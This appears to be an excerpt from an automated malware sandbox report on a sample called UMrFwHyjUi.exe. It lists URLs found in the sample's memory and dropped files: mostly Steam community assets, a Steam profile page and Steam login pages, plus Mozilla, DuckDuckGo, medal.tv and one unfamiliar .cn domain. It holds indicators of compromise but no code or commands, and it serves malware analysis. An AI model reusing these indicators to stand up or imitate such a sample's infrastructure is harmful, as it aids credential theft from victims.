                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&am
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=i46kIf4uDBX
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: CAAEBF.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
